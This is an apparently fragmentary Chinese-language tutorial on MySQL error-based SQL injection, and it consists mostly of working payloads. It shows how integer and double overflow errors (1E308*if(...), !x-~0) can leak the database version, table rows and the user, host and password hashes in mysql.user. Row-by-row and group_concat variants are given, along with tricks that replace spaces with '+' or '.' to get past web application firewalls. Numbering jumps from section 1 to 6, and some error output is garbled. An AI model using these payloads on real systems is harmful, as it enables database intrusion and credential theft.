1.查詢數據庫版本:
select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version())x),2,2)或者=select if(x,2,2)*1E308 from(select version()x)y
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 from Dual), 18446744073709551610.1844674407370955 1610))' 1610))'
select 2*if((select * from (select * from test.shop)as a limit 1)>(select * from test.shop limit 1),18446744073709551610, 18446744073709551610);=select 1E308*if((select * from(select * from mysql.user) a limit 1)>(select *from mysql.user limit 1),2,2)
select 2*if((select * from(select * from (mysql.user) limit 1) as a limit 1)<(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2),18446744073709551610.1844674407370955 1610);=select 1E308*if((select * from(select * from mysql.user limit 1)a limit 1)>(select * from mysql.user limit 0),2,2)
可以修改limit後面的參數,來選擇報錯哪行數據,只要求使用limit只查詢一行數據。如報錯查詢第二行數據:select 1E308*if((select * from(select * from mysql.user limit 1,1)a limit 1)>(select * from mysql.user limit 0),2,2)
需要注意的是該方法並不適用於老版的mysql,在mysql5.5存在。除此之外還需要了解錯誤信息的長度限制,這將決定可以獲取多長的信息
select 1E308*if((select user||host||password from (select * from mysql.user limit 1)a limit 1),2,2)
可以修改limit後面的參數,來選擇報錯哪行數據,只要求使用limit只查詢一行數據。如報錯查詢第二行數據:select 1E308*if((select user||host||password from (select * from mysql.user limit 1,1)a limit 1),2,2)
select 1E308*if((select *from mysql.user limit 1)>(select 1),2,2)
6.其他的一些變形語句:
select (i IS NOT NULL) --9223372036854775808 FROM (SELECT version())i)aselect (x!=0x00)--9223372036854775808 FROM (select version()x)y
在mysql中,select後查詢字段前的空格可以用+號代替或直接省略掉,其他地方的空格則不能替換。如select host,user from mysql.user 可以換爲select+host,user from mysql.user 或者 selecthost,user from mysql.user
select!x-~0.from(select+user()x)f;
select!x-~0.from(select concat(host,user)x from mysql.user limit 1)f;
爆所有行數據:select!x-~0.from(select group_concat(host,user)x from mysql.user)f;只要將查詢的數據使用concat或者group_concat合在一起組成一個字段x就可以報錯注入了,上面語句中~0後面的.是用來代替空格的,即如果查詢語句中查詢的參數最後是數字,則可以用.來代替 空格。加上上面說的select後的空格可以用+號來代替,可以構造類似如下的語句來繞過waf等:
select+1.from mysql.user;
select+user,1.from mysql.user;